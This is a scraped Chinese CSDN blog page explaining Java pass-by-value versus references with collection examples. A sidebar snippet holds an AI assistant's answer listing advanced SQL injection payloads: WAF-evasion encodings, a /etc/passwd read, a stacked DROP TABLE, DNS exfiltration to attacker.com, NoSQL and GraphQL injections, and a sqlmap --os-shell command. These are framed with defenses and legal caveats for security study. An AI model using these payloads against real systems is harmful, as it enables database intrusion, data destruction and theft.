基础夯实

最新推荐文章于 2025-03-16 15:49:36 发布
最新推荐文章于 2025-03-16 15:49:36 发布
阅读量125 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 软编码 文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/caoruntie/article/details/84478496
本文通过示例代码深入探讨了Java中传值与传引用的区别,特别是针对集合类对象的操作,解释了为何需要显式地从集合中移除元素以避免内存泄漏。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

阅读一些开源代码与框架,基础知识如果不扎实,阅读理解起来,总感觉雾里看花,这篇博客是自己终将付出的代价,

 

1、java是传值还是传引用?

比如你看nio源码,发现一些常规的用法就是每次使用selectionKey,后面总会remove掉,如果不remove掉,selector中的selectionKeys(),注册的key将会无线膨胀,将会导致内存溢出。

public class TellMe {
	public static void main(String[] args) {
		Selector st = new Selector();
		st.addElement("中国");
		Set<String> citys = st.elements();
		//循环移除掉
		Iterator<String> iterator = citys.iterator();
		while(iterator.hasNext()){
			iterator.next();
			iterator.remove();
		}
		System.out.println("selector 里面 还有元素吗?"+ citys.size());
	}
}
class Selector{
	private  Set<String> keyset = new HashSet<String>();
	public  void addElement(String e){
		keyset.add(e);
	}
	public Set<String> elements(){
		return keyset;
	}
}

 

     

public class Dev2Test { 
public static void main(String[] args) { 
List<Obj> objs = new ArrayList<Obj>(); 
Obj Obj = new Obj(); 
Obj.setAge(10); 
objs.add(Obj); 
Obj.setAge(20); 
Obj = null; 
System.out.println(Obj +" /\\ "+objs.get(0).getAge()+" /\\ "+objs.get(0)); 
System.out.println(); 
} 
} 
class Obj{ 
private int age; 
public int getAge() { 
return age; 
} 
public void setAge(int age) { 
this.age = age; 
} 
}

   

 Obj = null;只是让Obj对象的Obj的引用去掉彼此间的引用关系,

实际objs中还保留了一个引用,所以还是    不会被gc掉的。

这篇文章讲得比较通俗易懂,java对象与引用http://www.thinkingbar.com/2013/08/java%E5%AF%B9%E8%B1%A1%E5%8F%8A%E5%85%B6%E5%BC%95%E7%94%A8/

UVM 验证方法学之interface学习系列文章(一)基础夯实
那么菜的博客
04-27 1113
系列文章目录 提示:这里可以添加系列文章的所有文章的目录,目录需要自己手动添加 例如:第一章 Python 机器学习入门之pandas的使用 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 系列文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习..
C#探索之路基础夯实篇(6):C#在Unity中的自定义特性
qq_1628941121的博客
10-24 1071
自定义特性(Attribute)是一种可以附加到类、字段、方法等各种元素上的标记,用于在编译时或运行时提供额外的信息或功能。它们是 C# 语言中的一种元编程特性,允许开发者通过声明性的方式为代码添加元数据。
C语言基础夯实
zjn15000的博客
05-02 1088
按位右移>> 之前比较熟悉无符号数右移,比如b101 >> 2 = b1,那么有符号数右移呢? -5 >> 2 即 b11111011 >> 2 = b11111110 = 0 有符号数右移左边的二进制位补1,无符号数右移是左边的二进制位补0。 2. 按位与&和逻辑与&&的区别 逻辑与是将要运算的两个数看作一个整体,而这个整体如果是0,则该数被定义成逻辑假(0);如果该数为0(管是正的还是负的),则被定义成逻辑真。 3 &am.
android基础夯实2
ShareUs的专栏
01-28 577
24)把功能都用H5实现然后把需求都扔给前段的人去做; 》用h5开发出的web app体验上并比原生app差太多,但其跨平台的特性大大减低了开发成本,而且可以快速迭代。 25)ServiceManager、ActivityManager、packageManager 、*****Manager 都弄懂了?   >在Android系统中用到最多的通信机制就是Binder,Binder主
spring基础夯实(二)
weixin_43643315的博客
05-13 609
创建A时会首先记录A对应的beanName,并将创建工厂加入缓存中,对A的属性填充yeshidi奥永populate方法的时候对B进行递归创建,因为B也存在A属性,因此再实例化B的populate方法中又会再次初始化B,直接调用ObjectFactory去创建A。在B中创建依赖A时通过ObjectFactory提供的实例化方法来中断A中的属性填充,使B中持有的A是刚刚初始化没有任何属性的A,因为A与B中的A所表示的属性地址是一样的,所以在A创建好的属性填充自然可以通过B中的A获取,这样就解决了循环依赖。
基础夯实基础数据结构与算法(二)
熊泽-学习中的苦与乐
01-19 4250
基础夯实基础数据结构与算法(二)常见的10种算法1、递归算法例题1:计算n!例题2:斐波那契数列例题3:递归将整形数字转换为字符串例题4:汉诺塔例题5:猴子吃桃例题6:N皇后问题2、排序算法冒泡排序:快速排序:3、二分查找算法4、搜索算法5、哈希算法6、贪心算法7、分治算法求x的n次幂归并排序8、回溯算法9、动态规划(DP)算法10、字符串匹配算法参考文献 上一章我们说了常见的10种数据结构,接下来我们说常见的10种算法。 上一章地址:基础夯实基础数据结构与算法(一),怎么清楚的可以去瞅瞅。 常见的1
【Mysql底层】基础夯实(一)
weixin_43643315的博客
05-13 769
数据是按照索引值顺序存储的,无法用于排序;关联查询需要排序时会分成两种情况,如果order by子句的所有列都来自关联的第一个表,那么mysql在关联处理第一个表进行文件排序 explain会出现using filesort,其余情况会先将关联结果存放到临时表,在所有的关联都结束后在进行文件排序,explain的extra会出现using temporary using filesort。根节点存放了指向子节点的指针,从这些指针向下查找,通过比较节点页的值和要查找的值可以找到合适的指针进入下层节点。
HTML 基础夯实:标签、属性与基本结构的学习进度(二)
03-16 1126
HTML 基础夯实:标签、属性与基本结构的学习进度(二)
机器学习深度学习基础夯实系列 - 开幕式
weixin_41684423的博客
10-04 322
研究生入学一年,随着研究的深入,愈发觉得基础的重要。 原来觉得了解那些常规的模型,会写代码,能照猫画虎就行了,就能把“需求”置于死地。 他们代指“需求问题” 现在愈发的感觉到老话说的好,基础牢地动山摇,所以为了下一步能走的更加悠然 新三步变成成:夯实基础,数学支撑,灵活应用。 从今天开始,从今天晚上十点钟开始,我要重学基础,温故知新, 尽量将内容和大家分享(也没啥人看) 作为一个二手的科学家 与君共勉 ...
Java 基础夯实系列上线预告
安卓进化论
10-22 594
在《你是否需要一份安卓技能树点成计划》中我们提出了“安卓进阶技能树点成计划”,通过调查问卷和朋友们的反馈结果,证明这件事是有价值的。完成这样的一个计划需要耗费十分大的精力,好在文章发出后有 11 名小伙伴主动联系我们,愿意参与进来。于是我们一起创建了 GitHub 组织:同时创建了项目:结合安卓开发者的学习路线,第一部分我们将夯实 Java 基础。说到 Java 基础,很多朋友可能会觉得这有什么好
JAVA课件基础夯实
01-05
该PPT详细的讲述了Java中文件与数据流的相关内容,内容精干又全面
前端基础夯实、深入进阶与算法数据结构全解析
07-28
本文档是对前端开发领域中基础知识点的全面梳理与深入讲解,并结合了算法和数据结构的核心概念,为读者提供了一套系统的学习路径。内容涵盖了前端开发的基础技能,如HTML、CSS和JavaScript,同时也深入到高级话题,...
前端开发JavaScript进阶与轮播特效全解析:从基础夯实到实战项目及性能优化JavaScript的进阶
最新发布
08-15
文章首先夯实JavaScript的基础,讲解了ES6中引入的`let`和`const`变量声明方式、块级作用域的概念、箭头函数的特点,以及JavaScript的作用域链和变量提升现象。接着深入探讨了JavaScript的异步编程,包括回调函数...
2022高一物理(人教版)必修2基础夯实:75探究弹性势能的表达式终稿.pdf
02-21
2022高一物理(人教版)必修2基础夯实:75探究弹性势能的表达式终稿.pdf仅为我们提供了弹性势能的详细分析,还通过丰富的例题,帮助学生深化对弹性势能概念的理解和应用能力。 弹性势能,是指在物体发生弹性形变时...
安全基础夯实主题年活动实施方案.docx
10-01
安全基础夯实主题年活动实施方案.docx
guava与lang3比较学习
caoruntie的专栏
09-09 1611
guava是google大牛公司内部使用的java工具类,整个设计是毋庸置疑的,与传统的commons-lang比较,可能很多人还是选择了guava,因为都是比较接地气的工具类,小部分模块使用需要做深入探讨,对于其它还是做使用级别的了解。   guava  googlecode地址详见https://code.google.com/p/guava-libraries/     ...
如何有效处理interruptException异常
caoruntie的专栏
05-15 1037
对于如何有效处理interruptException异常, 参见大湿Brian  Goetz:http://www.ibm.com/developerworks/cn/java/j-jtp05236.html                                                          http://agapple.iteye.com/blog/970055...
三年一觉编程梦
caoruntie的专栏
11-11 723
从进入大学时知互联网为何物到如今从事程序设计已多年,有太多的感慨,也许是当你记录心事和回忆过往时,你已在变老,在编程界的摸爬滚打的日子里,从基本的html网页设计到C语言基本流程控制,中途偏离自学了C#,最终回归java,从j2se到j2ee,从ssh到Ejb等等,迄今学习java已三载有余,从最初j2se自己开发的模拟QQ到jsp+servlet+jdbc做的网上书店,都是一些启蒙级别的自娱自...
akka接地气构建一个简单分布式系统
caoruntie的专栏
11-26 720
  业务需要,小组内部搭建了一个基于akka简单的分布式集群,尽量轻量级。 业务场景,简要说下,目前业务数据量比较大,且还在以每天几十万的数据量递增,现在需要根据这些历史数据,从同的维度,且维度可能组合,统计相关业务数据,其中包括数据挖掘,数据运营,同时还有可能业务告警,同时还要求数据尽量及时,而且考虑到后续可扩展,可以增加任意其他维度,能够快速响应等, 从上面的描述中,我们可以提供几...
我是基础夯实的白帽子,请介绍sql注入高级手法
03-09
<think>好的,用户现在是一位自称基础夯实的白帽子,想要了解SQL注入的高级手法。首先,我需要确定用户的基础水平,虽然他说基础夯实,但“高级手法”可能涵盖很多内容,我需要从基础到进阶的结构来组织信息,确保他能够逐步理解。 用户之前的问题是关于预编译查询绕过和双引号报错的情况,可能他现在已经掌握了基本的注入技巧,现在希望深入更高阶的方法。所以,我需要覆盖那些超出基础联合查询或报错注入的内容,比如时间盲注、二次注入、堆叠查询等,同时也要包括绕过WAF的技巧和新型数据库的特性。 接下来,我需要考虑如何分类这些高级手法,以便用户能够系统地学习。可能分成几个大类,比如绕过防御机制、非常规注入点、高级利用技巧、特定数据库特性、工具配合使用等。每个类别下再细分具体的技术点,例如编码绕过、预编译绕过、非常规协议注入等。 同时,用户可能需要实际案例或示例来理解这些手法的应用场景。比如,二次注入的例子,或者利用数据库特性如JSON注入的具体Payload。这些例子需要简洁明了,让用户能够快速抓住要点。 还要注意强调防御机制,因为了解攻击手法的同时,知道如何防御也是白帽子的职责。比如,在介绍每种高级手法时,可以简要提及相应的防御措施,帮助用户全面理解。 另外,用户可能对自动化工具的使用感兴趣,比如如何配合sqlmap的tamper脚本进行高级测试。需要给出具体的命令示例,并解释每个参数的作用,这样用户可以直接应用。 最后,需要提醒用户在进行高级注入测试时的注意事项,比如法律授权、避免对生产环境造成影响等,确保其行为符合道德和法律规范。 总结下来,回答的结构应该是先分类高级手法,每个类别下详细说明技术点,提供示例和防御建议,最后补充工具使用和注意事项。这样既系统又实用,能够满足用户从基础到进阶的学习需求。</think>以下是针对SQL注入的**高级手法与深度防御绕过技巧**的系统化梳理,涵盖非传统场景、新型数据库特性及防御绕过策略: --- ### 一、绕过防御机制类 #### 1. **预编译查询绕过** - **场景**:当SQL语句中**动态拼接表名/列名/排序字段**时 ```sql -- 原语句:SELECT * FROM products ORDER BY $user_input 注入Payload:`id` ASC,(CASE WHEN (SELECT CURRENT_USER)=’admin’ THEN SLEEP(5) ELSE 0 END) ``` - **防御建议**:白名单校验排序字段 #### 2. **WAF规则绕过** - **多重编码混淆**: ```sql %2522union%250Aselect%23x%0A1,2,3%2523 ``` 解码后等价于:`"union select 1,2,3#` - **空白符变异**: ```sql SELECT/*!50000+user*/FROM/*![mysql.user*/--%0a] ``` 利用MySQL内联注释特性绕过关键词检测 --- ### 二、非常规注入点类 #### 1. **JSON/XML参数注入** - **场景**:后端解析JSON/XML时提取参数值拼接SQL ```json {"filter": {"name":"admin\" OR 1=1 -- "}} ``` - **防御建议**:对所有输入源进行统一过滤 #### 2. **HTTP头注入** - **攻击向量**: ``` X-Forwarded-For: 1.1.1.1' AND (SELECT LOAD_FILE('/etc/passwd')) IS NOT NULL -- ``` 适用于日志分析系统等场景 --- ### 三、高级利用手法类 #### 1. **堆叠查询注入(Stacked Queries)** - **适用数据库**:SQL Server、PostgreSQL ```sql '; DROP TABLE users; -- ``` - **防御建议**:禁用多语句执行 #### 2. **带外数据渗出(OOB Exfiltration)** - **DNS外带数据**(适用于无回显场景): ```sql '; DECLARE @q VARCHAR(100);SET @q=(SELECT TOP 1 column_name FROM information_schema.columns); EXEC('master..xp_dirtree "\\'+@q+'.attacker.com\"'); -- ``` - **防御建议**:限制数据库外连权限 --- ### 四、新型数据库特性利用 #### 1. **NoSQL注入(MongoDB示例)** - **注入Payload**: ```javascript username[$ne]=1&password[$regex]=^a ``` 探测密码首字母是否为a #### 2. **GraphQL注入** - **恶意查询构造**: ```graphql query { users(filter: "id=1 UNION SELECT * FROM passwords") } ``` --- ### 五、特殊场景攻击链 #### 1. **二次注入攻击** - **攻击流程**: 1. 注册用户名:`admin' -- ` 2. 修改密码时触发:`UPDATE users SET password='newpass' WHERE username='admin' -- '` - **防御建议**:存入数据库前进行二次过滤 #### 2. **文件系统结合攻击** - **MySQL LOAD_FILE利用**: ```sql UNION SELECT LOAD_FILE('/etc/passwd'),2,3 -- ``` --- ### 六、自动化工具高级用法 #### sqlmap进阶参数组合: ```bash sqlmap -u "http://target.com/search?q=test" \ --level=5 --risk=3 \ --tamper=charencode,space2comment \ --dbms=mysql \ --os-shell ``` - **关键参数**: - `--search`:自动搜索表名中包含"password"的字段 - `--sql-query`:直接执行自定义SQL语句 --- ### 七、防御对抗checklist | 防御层 | 攻击手段 | 防御方案 | |----------------|---------------------------|-----------------------------| | 输入过滤 | 编码绕过/空白符变异 | 统一输入解码后校验 | | 权限控制 | 文件读取/系统命令执行 | 数据库账户最小权限原则 | | 日志监控 | 盲注慢速攻击 | 设置SQL执行时间阈值 | | 架构设计 | NoSQL注入 | 使用严格Schema验证的ORM框架 | --- ### 八、法律与伦理边界 1. 必须获得**书面授权**后再测试 2. 禁止使用`DROP TABLE`等破坏性语句 3. 发现漏洞后立即停止深入利用 建议结合OWASP SQL注入备忘单([Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html))进行系统性学习。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值